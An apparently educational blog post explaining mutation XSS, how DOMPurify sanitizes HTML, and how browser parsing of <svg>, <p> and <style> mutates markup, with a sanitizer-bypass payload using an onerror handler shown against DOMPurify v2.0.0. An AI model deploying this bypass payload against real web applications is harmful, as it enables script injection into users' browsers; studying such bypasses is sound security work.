mXSS - The Parsing Magics

What is mXSS?

Due to parsing differences between sanitizers (e.g., DOMPurify) and browsers, input can be mutated (or transformed) when appended to the DOM tree using innerHTML.
In simple terms, abusing these parsing differences is called mXSS (mutation XSS).

How Does an HTML Sanitizer Work?

Parsing: The HTML content is parsed into a DOM tree, either on the server or in the browser.
Sanitization: The sanitizer iterates through the DOM tree and removes any dangerous or harmful content.
Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
Re-parsing: The serialized HTML is reassigned to innerHTML, triggering another parsing process.
Appending to Document: Finally, the sanitized DOM tree is appended to the document.

DOMPurify – Behind The Scenes

A client-side JavaScript library used to sanitize HTML inputs and prevent XSS attacks.

Execution Flow

DomPurify Execution Flow

DOMPurify Internals

_initDocument
Uses DOMParser API to parse unsafe input into a DOM structure.
_createNodeIterator
Uses NodeIterator to traverse each DOM node in order.
_sanitizeElements
- Checks for DOM clobbering and known attack vectors like mXSS.
- Removes or escapes disallowed tags (e.g., <script>, <iframe>, etc.).
_sanitizeShadowDOM
- DOMPurify normally skips <template> and Shadow DOM.
- This function recursively dives into fragments and sanitizes those too.
_sanitizeAttributes
- Goes through each attribute (onclick, href, src, etc.) and strips or modifies malicious ones.
body.innerHTML
- After sanitization, the DOM is serialized back into clean HTML and reinserted into the page.

Get Our Hand Dirty

Let’s understand what is mXSS with a small example:

element.innerHTML = '<u>some <i> HTML'

After inserting using innerHTML, when we retrieve the HTML, it looks different than the input.

<u>
    Some 
    <i>HTML</i>
</u>

This happens because HTML is designed to be fault-tolerant.

The svg Magic

element.innerHTML = '<svg><p>is this in svg?</svg>'

This gets parsed as:

<svg></svg>
<p>is this in svg?</p>

Here, <p> is moved out of <svg> since it’s not a valid child.

More Examples

<svg> tag can’t have <p> as a child.
<form> tag cannot contain a nested <form>.
<style> treats everything inside as text, even if it’s a tag.

[More such rules here].(https://sonarsource.github.io/mxss-cheatsheet/)

The Escape

element.innerHTML = '<svg></p>is this is in svg?</svg>'

This gets parsed into:

<svg>
  <p></p>
  is this is in svg?
</svg>

Now mXSS is possible! DOMPurify gets bypassed because it assumes <svg> can’t contain malicious tags. But the browser parses it differently.

<svg></p> becomes a base for mXSS payloads inside <svg>.

Example:

<svg></p><style><a id="</style><img src=1 onerror=alert(1)">

DOM becomes:

<svg>
  <p></p>
  <style>
    <a id="</style><img src="1" onerror="alert(1)">
    ">
  </style>
</svg>

This XSS triggers even though it’s inside a <style> block. That’s because **<svg>**** changes the parsing rules to XML** (foreign content), which behaves differently.

Abuse in DOMPurify v2.0.0

Payload:

<svg></p><style><a id="</style><img src=1 onerror=alert(1)">

DOMPurify doesn’t sanitize the onerror attribute because it thinks everything inside <style> is just text.

mXSS

But when this is inserted into the DOM using innerHTML, the browser parses it differently:

<svg></svg>
<p>
  <style><a id="</style>
  <img src="1" onerror="alert(1)">
  ">
</p>

Why Does `<svg>` Close Early?

Even though we expected it to close at the end, the presence of `<style>` causes the parser to exit "foreign content mode."

According to § 13.2.6.5: Parsing foreign content, when the parser is inside a foreign element (like <svg>) and sees a tag that isn’t allowed (like <style>), it exits the foreign mode.
It pops <svg> off the stack and reprocesses the next tag (<style>) in HTML mode, continuing normally.

Bonus:

ChatGPT is my friend 😄 – See my chat with it